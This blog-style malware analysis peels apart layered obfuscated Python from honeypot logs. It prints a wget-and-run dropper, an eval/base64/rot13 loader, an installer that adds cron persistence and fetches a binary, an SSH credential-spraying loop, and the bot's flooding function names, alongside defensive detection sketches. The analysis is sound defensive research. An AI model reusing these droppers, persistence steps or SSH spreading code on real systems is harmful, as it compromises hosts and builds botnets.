Deobfuscating multiple layers of malicious python
1. Background
One of my research projects analyzes large sets of honeypot logs in order to identify emerging trends in Tools, Techniques, and Procedures (TTPs) within deployed malware. A recent trend, reported by one of our daily statistical correlation tools, caught my eye and warranted further investigation. Since the results of my analysis may be of interest to others, here's a quick breakdown of one particular python rabbit hole. It's not amazingly complex, but it is far from simple, and it is a good example of malware using multiple layers of obfuscated python.
2. Layer One: command line bash/ssh
The honeypot log in question turned up the following commands (formatted for readability), which started appearing at low levels on 2021-12-12. Other bot networks send similar commands hundreds or thousands of times a day, but this particular command is only caught a few times a day.
```sh
cd /tmp
(( apt update -y && apt install python3 wget -y ) || ( yum update -y && yum install epel-release -y && yum install python3 wget -y ))
wget -O updater.zip [MALWAREURLCENSORED]
python3 updater.zip
rm updater.zip && cd ~
```
This part isn't anything special, of course: it's a simple
downloader/dropper that first tries to make sure the tools it needs
(python3 and wget) are installed. It assumes a Debian- or
Red Hat-like system (apt or yum), but it will still work on other
systems that already have python3 and wget installed (like
many, if not most, *nix systems).
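If you want to flag this dropper in your own honeypot logs, here is a minimal sketch. It uses a regular expression keyed on the two distinctive steps: downloading to updater.zip with wget, and then running that file with python3. The pattern and function name are my own assumptions, not a published signature. Any variant that renames the file will slip past it.

```python
import re

# Hypothetical signature: "wget -O updater.zip <url>" followed later by
# "python3 updater.zip". DOTALL lets the match span multi-line log entries.
DROPPER_RE = re.compile(
    r"wget\s+-O\s+updater\.zip\s+\S+.*?python3\s+updater\.zip",
    re.DOTALL,
)


def looks_like_updater_dropper(command: str) -> bool:
    """Return True if a logged shell command matches the dropper pattern."""
    return DROPPER_RE.search(command) is not None
```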
Outstanding question 1: scripts like this always leave me with random
questions, such as "what's the point of the final cd to $HOME?"
3. Layer Two: the downloaded python script
The python script that was downloaded (updater.zip above) is much
more interesting (formatted for brevity, with the actual malware
removed):
```python
import base64, codecs
magic = 'aW1wb3J0IHN5cyx...BmbDoNCgkJCQlp'
love = 'MvOhqlOcovOzoP5l...A0MJ1xYJkiM2yh'
god = 'ZCIpDQoJCQlzeXMuZ...8gJycnKQ0KCQlh'
destiny = 'LzZbWlpaVT1eM...tcQDbAPvNAPt0X'
joy = '\x72\x6f\x74\x31\x33'
trust = \
    eval('\x6d\x61\x67\x69\x63') + \
    eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + \
    eval('\x67\x6f\x64') + \
    eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
```
First, to the author: good creative use of variable names.
So what does the above do?
- Creates 4 variables (magic…destiny) holding base64-encoded strings.
- Creates a 5th variable (joy) containing the string "rot13", written as hexadecimal escape sequences.
- Creates a 6th variable (trust) by concatenating the results of multiple calls to eval(). Each input to eval() is further obfuscated by writing it as hexadecimal escape sequences, which prevents (easy) human reading. The arguments of these eval() calls are really:
  - the string 'magic', which yields the contents of the magic variable
  - codecs.decode(love, joy), which applies the rot13 substitution cipher to the contents of the love variable
  - the string 'god', which yields the contents of the god variable
  - codecs.decode(destiny, joy), i.e. the rot13-decoded contents of the destiny variable
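The eval() arguments are just string literals written with \x escapes. That means Python's own parser can undo the hex encoding without running anything. Here is a sketch using the standard ast module. The function name is hypothetical.

```python
import ast
from typing import List


def eval_string_arguments(source: str) -> List[str]:
    """List the string literals passed directly to eval() in some source.

    ast.parse() only parses the code; nothing is executed. The parser
    resolves escapes such as '\\x6d\\x61\\x67\\x69\\x63' into 'magic'.
    """
    found = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id == "eval"
            and node.args
            and isinstance(node.args[0], ast.Constant)
            and isinstance(node.args[0].value, str)
        ):
            found.append(node.args[0].value)
    return found
```

If you run it against the layer-two script, it should surface 'magic', 'codecs.decode(love, joy)', 'god', 'codecs.decode(destiny, joy)' and 'trust'. The outer eval(compile(...)) call is skipped because its argument is not a plain string literal.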
Summarizing for readability, the trust assignment line becomes:

```python
trust = magic + \
    codecs.decode(love, joy) + \
    god + \
    codecs.decode(destiny, joy)
```
The trust variable ends up holding a base64 string of 1824
characters. This string is finally passed to base64.b64decode(),
and the decoded result, yet another python script, is compiled
and executed with eval().
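You can replay the same steps safely by swapping the final compile()/eval() for a plain decode. That way the hidden script is returned as text instead of being run. This is a minimal sketch, assuming the four strings have already been copied out of the dropper. The function name is hypothetical.

```python
import base64
import codecs


def reassemble_layer_two(magic: str, love: str, god: str, destiny: str) -> str:
    """Rebuild the layer-three script without executing it.

    Mirrors the dropper: 'magic' and 'god' are plain base64 fragments,
    while 'love' and 'destiny' were additionally rot13-encoded.
    """
    trust = (
        magic
        + codecs.decode(love, "rot13")
        + god
        + codecs.decode(destiny, "rot13")
    )
    # Decode only; the dropper would instead compile() and eval() this.
    return base64.b64decode(trust).decode("utf-8")
```

rot13 only rotates ASCII letters. Applying it to a base64 string therefore leaves digits, +, / and = untouched, and the result is still valid base64 once reversed.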
4. Layer Three: the embedded, evaluated python script
The previous step produces a longer string of python code, which is
passed to compile() and eval() to run the following (edited for
formatting, with the malware URL removed). I'll break this longer
script into chunks.
First, the top few lines import the needed modules and define the nw
variable, setting it to the string "12", which I'll get back to in a minute.
```python
import sys,os,subprocess,time
nw="12"
```
After that come a number of functions that, as far as I can tell, are just filler, since they're never actually used:
```python
def a(b):
    c = b*2
    return c

def oO1oO(OO):
    OOO = 0
    return OO

def oOOOO2(OO):
    OOO = 0
    return OO

def oOo1(OO):
    OOO = 0
    return OO
```
Next there is one more function, which actually is used. It is a
thin wrapper around os.system() that swallows any exception, so the
script keeps going no matter what:
```python
def abc(cl):
    try:
        os.system(cl)
    except:
        pass
```
Finally comes the meat of the script. It starts by checking whether a
/opt/lsb/.pki file exists on the system being compromised and whether
it contains the string from the nw variable above ("12"). It sets the
ald variable to 1 if the file exists and contains "12", and to 0
otherwise.
The importance of the ald variable will become apparent in a minute.
I'll also question the need for the while True component of this
script at the end of this post.
```python
while True:
    try:
        ald = 0
        try:
            with open('/opt/lsb/.pki', "r+") as fl:
                if nw in fl.read():
                    ald = 1
                else:
                    ald = 0
        except:
            ald = 0
```
Next, the script similarly sets a crn variable to 1 if the current
user's crontab already contains the string "fuse", the name of the
final malware binary (as we will see a bit later).
```python
        crn = 0
        try:
            cron = subprocess.check_output("crontab -l",shell=True).decode('utf-8')
            if "fuse" in cron:
                crn = 1
            else:
                crn = 0
        except:
            crn = 0
```
Now that the script has properly probed the system for components of
its previous runs, it can actually do something with the results.
First, it checks to see if the ald variable indicates that "12"
was in the /opt/lsb/.pki file:
```python
        if ald == 1:
            print("[1]- Stopped /usr/lib/systemd/systemd-logind")
            sys.exit()
```
This check functions as a simple version check. A host that already
has the current version exits early. A previously compromised host
that has an older version falls through to the rest of the script and
gets reinstalled. So if the author changed the nw variable to "13"
while "12" was stored in /opt/lsb/.pki, the rest of the script would
keep running and self-update to the latest and greatest malware.
Outstanding question: what's the purpose of this print message?
Note/Bug: because a plain substring search is used for "12", the check would also match "112" or any other string containing "12". The version handling therefore isn't as robust as it could be. But I'm certainly being picky here in my code review.
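To make the false positive concrete: the marker file ends up holding a line like keys-0 12, and a substring test cannot tell that apart from keys-0 112. The sketch below compares the script's substring test with an exact token comparison. Both helper names are hypothetical.

```python
def substring_check(marker_text: str, nw: str) -> bool:
    # What the script does: any occurrence of nw anywhere counts.
    return nw in marker_text


def exact_version_check(marker_text: str, nw: str) -> bool:
    # Stricter: require a "keys-0 <version>" line whose version equals nw.
    for line in marker_text.splitlines():
        fields = line.split()
        if len(fields) == 2 and fields[0] == "keys-0" and fields[1] == nw:
            return True
    return False


print(substring_check("keys-0 112\n", "12"))      # True (false positive)
print(exact_version_check("keys-0 112\n", "12"))  # False
```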
Next up, the script installs fuse with apt or yum, kills any
running process named fuse, and removes any existing fuse binary
from /usr/sbin:
```python
        abc(''' apt install fuse python3 -y || yum install epel-release python3 fuse -y ''')
        abc(''' pkill fuse; rm /usr/sbin/fuse -R ''')
```
Afterward, if there is no cron job installed to re-run the fuse
binary at reboot, it adds a crontab entry to do so. (Again, the
previous check for the string "fuse" in any cronjob will probably
produce some false positives.)
```python
        if crn == 0:
            abc('''(crontab -l 2>/dev/null || true; echo "@reboot pkill updated;nohup /usr/sbin/fuse>/dev/null &") | crontab - ''')
```
Next, the script (re)creates the /opt/lsb/.pki version number file:
```python
        abc(''' rm -R /opt/lsb/ ''')
        abc(''' mkdir /opt/lsb/ && echo 'keys-0 {}'>/opt/lsb/.pki '''.format(nw))
```
Finally, we get to the actual download, installation, and initial
run of the fuse malware. Again, the script uses print to display a
fake "Stopped" message for systemd-logind, for some reason.
```python
        abc(''' wget -O /usr/sbin/fuse [MALWAREURLCENSORED] && chmod +x /usr/sbin/fuse''')
        abc(''' nohup /usr/sbin/fuse>/dev/null & ''')
        print("[1]+ Stopped /usr/lib/systemd/systemd-logind")
        sys.exit()
    except:
        sys.exit()
```
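Taken together, this layer leaves a handful of host artifacts: the /opt/lsb/.pki marker, the /usr/sbin/fuse binary, and an @reboot crontab entry that launches it. Below is a rough triage sketch that checks for them. Two parts of it are my own assumptions: the function name, and taking a root directory as a parameter so it can also run against a mounted disk image. A hit is a lead worth following up, not proof of compromise.

```python
from pathlib import Path
from typing import List


def find_layer_three_artifacts(root: Path, crontab_text: str) -> List[str]:
    """Report artifacts the layer-three script is known to create.

    root: filesystem root to inspect, e.g. Path("/") or a mounted image.
    crontab_text: output of `crontab -l` for the user being checked.
    """
    findings = []
    marker = root / "opt" / "lsb" / ".pki"
    if marker.is_file():
        content = marker.read_text(errors="replace").strip()
        findings.append(f"marker file {marker} ({content!r})")
    binary = root / "usr" / "sbin" / "fuse"
    if binary.is_file():
        findings.append(f"binary {binary}")
    for line in crontab_text.splitlines():
        # Match the full path, unlike the script's bare "fuse" test, so
        # unrelated jobs that merely mention fuse are not flagged.
        if line.startswith("@reboot") and "/usr/sbin/fuse" in line:
            findings.append(f"crontab entry: {line.strip()}")
    return findings
```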
One final outstanding question: why the while True portion of
the script? Every path through the loop body ends in a call to
sys.exit(), which means the loop body should only ever run once
anyway.
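One detail makes this hold. sys.exit() raises SystemExit, and because SystemExit derives from BaseException, the bare except: clauses in the script do catch it. The outer except: just calls sys.exit() again, though, and that second exception is raised outside the try, so it escapes the loop. Here is a stripped-down sketch of the same control flow. The function is mine, not the malware's.

```python
import sys


def iterations_before_exit() -> int:
    """Mimic the script's while/try/except shape and count loop passes."""
    passes = 0
    try:
        while True:
            passes += 1
            try:
                sys.exit()  # stands in for the script's final sys.exit()
            except:  # noqa: E722 - bare except, as in the script; it catches SystemExit
                sys.exit()  # raised from the handler, so it leaves the loop
    except SystemExit:
        return passes


print(iterations_before_exit())  # 1
```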
5. Layer Four: compiled python
The final /usr/sbin/fuse binary that gets installed is also a python
script, but it has been packaged into a Linux ELF binary. We can
determine this by examining it with strings and/or objdump -D and
noticing a pydata section in the ELF dump output. This pydata
section contains a compiled python (pyc) formatted block, with a
16-byte header showing that a recent version of python was used to
compile it.
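Since Python 3.7, the 16-byte .pyc header follows the layout from PEP 552. It starts with a 4-byte magic number identifying the bytecode version and a 4-byte flags field. The last 8 bytes hold either the source modification time and size or, for hash-based pycs, a source hash. The sketch below decodes that header with the standard library, assuming you have the 16 bytes at the start of such a block. Comparing against importlib.util.MAGIC_NUMBER only tells you whether the running interpreter matches. Mapping any other value to a specific release still requires CPython's magic-number table.

```python
import importlib.util
import struct


def parse_pyc_header(header: bytes) -> dict:
    """Decode a 16-byte .pyc header laid out as described in PEP 552."""
    if len(header) < 16:
        raise ValueError("expected at least 16 bytes")
    magic = header[:4]
    (flags,) = struct.unpack("<I", header[4:8])
    info = {
        # First two bytes: little-endian version number; last two are b"\r\n".
        "magic_number": struct.unpack("<H", magic[:2])[0],
        "same_as_running_python": magic == importlib.util.MAGIC_NUMBER,
        "hash_based": bool(flags & 0x1),
    }
    if info["hash_based"]:
        # Hash-based pyc: 8-byte hash of the source file.
        info["source_hash"] = header[8:16].hex()
    else:
        # Timestamp-based pyc: source mtime and source size, both 32-bit.
        info["mtime"], info["source_size"] = struct.unpack("<II", header[8:16])
    return info
```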
Next, we dump this pydata section to a file so we can get at the compiled python bytecode:
```sh
objcopy -O binary --only-section=pydata \
    --set-section-flags pydata=alloc fuse fuse-pythoncode.bin
```
We can use pyinstaller's archive_viewer.py command to list and
extract the pieces of the saved pydata section:
```sh
cd pyinstaller
PYTHONPATH=. python3 \
    ./PyInstaller/utils/cliutils/archive_viewer.py -b ../fuse-pythoncode.bin | head -15
```
```
['struct',
 'pyimod01_os_path',
 'pyimod02_archive',
 'pyimod03_importers',
 'pyimod04_ctypes',
 'pyiboot01_bootstrap',
 'pyi_rth_pkgutil',
 'pyi_rth_multiprocessing',
 'pyi_rth_inspect',
 'fuse',
 '_cffi_backend.cpython-39-x86_64-linux-gnu.so',
 'bcrypt/_bcrypt.abi3.so',
 'cryptography/hazmat/bindings/_openssl.abi3.so',
 'cryptography/hazmat/bindings/_padding.abi3.so',
 'lib-dynload/_asyncio.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_bz2.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_cn.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_hk.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_iso2022.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_jp.cpython-39-x86_64-linux-gnu.so',
```
We note that fuse is also the name of the actual final python block
to be executed, so we extract it as well using archive_viewer.py's
X command. But it appears to be C-compiled CPython code, so decoding
it is a bit trickier. However, we're in luck, because the developer
wasn't as smart as they could have been: if we run strings on the
file, we see 4 base64-encoded strings in the output. As before, 2 of
these are also rot13-encoded, and we can combine them using the same
technique as for the four strings above (magic … destiny).
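You can approximate the strings step in Python by scanning the raw bytes of the extracted fuse block for long runs of base64 characters. Because rot13 only shuffles letters, the rot13-encoded chunks match too. In the sketch below, the function name and the 40-character minimum are my own choices. The threshold is there only to skip short symbol names.

```python
import re
from typing import List


def base64_candidates(blob: bytes, min_len: int = 40) -> List[str]:
    """Return runs of base64-alphabet characters at least min_len long."""
    # Optional trailing "=" padding is included in the match.
    pattern = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    return [match.group().decode("ascii") for match in pattern.finditer(blob)]
```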
6. Layer Five: the final python bot code
After decoding these 4 additional base64-encoded strings, we get an 845-line python bot script containing the following functions:
```sh
grep 'def ' final-packaged-python.py
```

```python
def encrypt(data,key):
def decrypt(data,key):
def litehash(data):
def getProxy():
def getRandomPayload(size):
def getRandomString(size):
def pack_varint(val):
def pack_str(bb):
def getSocket(ip, port,ifprox,recons,proxyHost=False,proxyPort=0):
def getSSL(sock, host):
def loader(addr):
def scan():
def http_get(task_name, url, host, ip, port,ifprox, rcns):
def http_fast(task_name, url, host, ip, port,ifprox, rcns):
def mccrash(task_name,ip,port,hostn,ifprox, rcns):
def mcbot(task_name,ip,port,hostn,ifprox, rcns):
def mcping(task_name,ip,port,ifprox, rcns):
def mcdata(task_name,ip,port,hostn,ifprox, rcns):
def junk(task_name,ip,port,ifprox, rcns):
def handshake(task_name,ip,port,ifprox, rcns):
def tcp(task_name,ip,port,size,ifprox, rcns):
def netty(task_name,ip,port,pkt,ifprox, rcns):
def raknet(task_name,ip,port):
def vse(task_name,ip,port):
def udp(task_name,ip,port,size):
def getHTTP(base):
def download_file(url, file):
def attack(method,ip,port,size,threads,times, ifprox, rcns):
def getIP():
def execer(cmd):
def updateProxy(url):
```
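grep works here because every definition sits on its own line. A stricter alternative is to walk the syntax tree, again without executing anything, so that strings or comments containing "def " are not counted. Here is a sketch with a hypothetical function name. It reports positional parameters only.

```python
import ast
from typing import List


def list_function_signatures(source: str) -> List[str]:
    """Return 'name(arg, ...)' for every def in the source, nested ones included."""
    signatures = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            # Positional parameters only; *args and keyword-only are omitted.
            params = [a.arg for a in node.args.posonlyargs + node.args.args]
            signatures.append(f"{node.name}({', '.join(params)})")
    return signatures
```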
As we can see from this set of functions, we've finally hit the end of the obfuscation train, revealing a general daemon containing various implements of destruction. Included in this final malware toolkit is the original payload delivery string we started with at the top of this post:
payload = "cd /tmp; ... python3 updater.zip && rm updater.zip && cd ~ "
Along with it, the code to deliver it over SSH:
```python
for i in credentials:
    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(addr, username=i[0], password=i[1])
        stdin, stdout, stderr = ssh.exec_command(f'cat /proc/1')
        if str(stdout.read()).split('b\'')[1] != '':
            i, o, e = ssh.exec_command(payload)
            time.sleep(10)
            break
        ssh.close()
    except Exception as E:
        #print(E)
        time.sleep(1)
        continue
```
7. Final comments
All in all, this was an interesting trail to analyze. It shows the greater level of obfuscation that more talented malicious actors use, beyond what basic script kiddies bother with.
Does this (still simple-ish) type of obfuscation technique work? Yes. It almost certainly lifts the author above the low-hanging fruit caught by average malware collection systems. For example, none of the scripts or files above appear in the industry's leading database (VirusTotal) as of the date this analysis was completed. I also submitted the final python payload to VirusTotal, but every engine reported it as "Undetected", i.e. not malicious, which is clearly an error.
The slowly increasing usage of python in active malicious actor communities will hopefully trigger more malware detection engines to beef up their automated algorithms. Hopefully.
Acknowledgments: thank you to Robert Story for reviewing this!